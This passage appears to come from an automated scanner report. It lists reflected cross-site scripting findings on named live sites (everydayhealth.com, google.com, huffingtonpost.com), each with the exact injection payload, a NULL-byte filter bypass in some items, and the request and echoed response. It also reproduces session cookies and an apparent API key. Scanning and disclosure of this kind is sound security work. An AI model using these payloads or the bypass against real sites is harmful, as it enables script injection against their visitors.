Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9361'%3b84c782d8b16 was submitted in the REST URL parameter 3. This input was echoed as a9361';84c782d8b16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspxa9361'%3b84c782d8b16 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPEoo5s1MDkxMWEzZi0yMDZiLTRjYTAtYWNmNS0wZTY1YTU3ODg5ZjQ1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=xn1xydrmhljdevihanbstg45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspxa9361';84c782d8b16', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.13. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a9efd"><script>alert(1)</script>8b47a959d8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9efd"><script>alert(1)</script>8b47a959d8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?%00a9efd"><script>alert(1)</script>8b47a959d8d=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPBnhcM4ODI1YTExNS0xOGU4LTQwMDktOTliYi0wZGFlYzYyZDY0MGU1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zln3ns55gb5bpcmolex34fm4; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49142


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   TVs Common in Daycare Centers Despite Guidelines - Kids' H
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?%00a9efd"><script>alert(1)</script>8b47a959d8d=1" />
...[SNIP]...

2.14. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f526d'%3bb39bf44577d was submitted in the REST URL parameter 3. This input was echoed as f526d';b39bf44577d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspxf526d'%3bb39bf44577d HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPID-ztmODA3YjBjZC03ZWNhLTRlNTQtODI4OS1lYTk2OWZjNDIxNzI1; expires=Wed, 13-Jul-2011 21:36:37 GMT; path=/
Set-Cookie: ASP.NET_SessionId=w3vie3btzynw5f451gmktxfe; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16651


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspxf526d';b39bf44577d', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.15. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d45e7"><script>alert(1)</script>ec06d481550 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d45e7"><script>alert(1)</script>ec06d481550 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?%00d45e7"><script>alert(1)</script>ec06d481550=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPE-GLMyMDBhOGIyYi0wNTRiLTQ3ZmYtYTVhZC00MDg4M2QxNGVlMTM1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jud0jt45dvf1vafmolehev55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47550


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   3 Ways to Put the Wow! Back in Your Sex Life - Sexual Heal
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?%00d45e7"><script>alert(1)</script>ec06d481550=1" />
...[SNIP]...

2.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 77493(a)5729f6350b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?77493(a)5729f6350b6=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1303613395.1.1.utmcsr=xss.cx|utmccn=(referral)|utmcmd=referral|utmcct=/apptesting.aspx; __utma=173272373.620417115.1303613395.1303613395.1303613395.1; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:57:38 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?77493(a)5729f6350b6\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

2.17. http://www.huffingtonpost.com/ [icid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The value of the icid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8739e"-alert(1)-"26ca8215966 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?icid=navbar_huffpo_main58739e"-alert(1)-"26ca8215966 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Thu, 05 May 2011 00:58:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
= 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/?icid=navbar_huffpo_main58739e"-alert(1)-"26ca8215966";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display_d
...[SNIP]...

2.18. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a79a"-alert(1)-"0ae47100ee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?icid=navbar_huffpo_main5&7a79a"-alert(1)-"0ae47100ee4=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=30
Date: Thu, 05 May 2011 00:58:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
= 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/?icid=navbar_huffpo_main5&7a79a"-alert(1)-"0ae47100ee4=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

2.19. http://www.huffingtonpost.com/2011/05/02/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76498"-alert(1)-"978acabc995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/02/?76498"-alert(1)-"978acabc995=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 123154
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=277
Date: Thu, 05 May 2011 10:58:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
le_fb_widgets = 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/02/?76498"-alert(1)-"978acabc995=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

2.20. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/02/holocaust-memorial-day_n_856638.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57a5e"-alert(1)-"d6ccc38ed4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/02/holocaust-memorial-day_n_856638.html?57a5e"-alert(1)-"d6ccc38ed4b=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.14.9.1304575182212; s_pers=%20s_getnr%3D1304575182214-New%7C1367647182214%3B%20s_nrgvo%3DNew%7C1367647182216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Osama%25252520Bin%25252520Laden%25252520Pictures%25252520Will%25252520Not%25252520Be%25252520Released%2525252C%25252520Obama%25252520Decides%25252520%25252528UPDATED%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:54 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 470003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
ent_vertical_name = 'world';
   HPConfig.current_vertical_id = 15;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/02/holocaust-memorial-day_n_856638.html?57a5e"-alert(1)-"d6ccc38ed4b=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.21. http://www.huffingtonpost.com/2011/05/04/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73665"-alert(1)-"b74fba3530f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/?73665"-alert(1)-"b74fba3530f=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 140702
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=287
Date: Thu, 05 May 2011 10:58:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
le_fb_widgets = 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/?73665"-alert(1)-"b74fba3530f=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

2.22. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/cnn-poll-finds-that-most-_n_857597.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 225fd"-alert(1)-"d892f95823f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/cnn-poll-finds-that-most-_n_857597.html?225fd"-alert(1)-"d892f95823f=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 256534
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:58:56 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
t_vertical_name = 'media';
   HPConfig.current_vertical_id = 4;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?225fd"-alert(1)-"d892f95823f=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
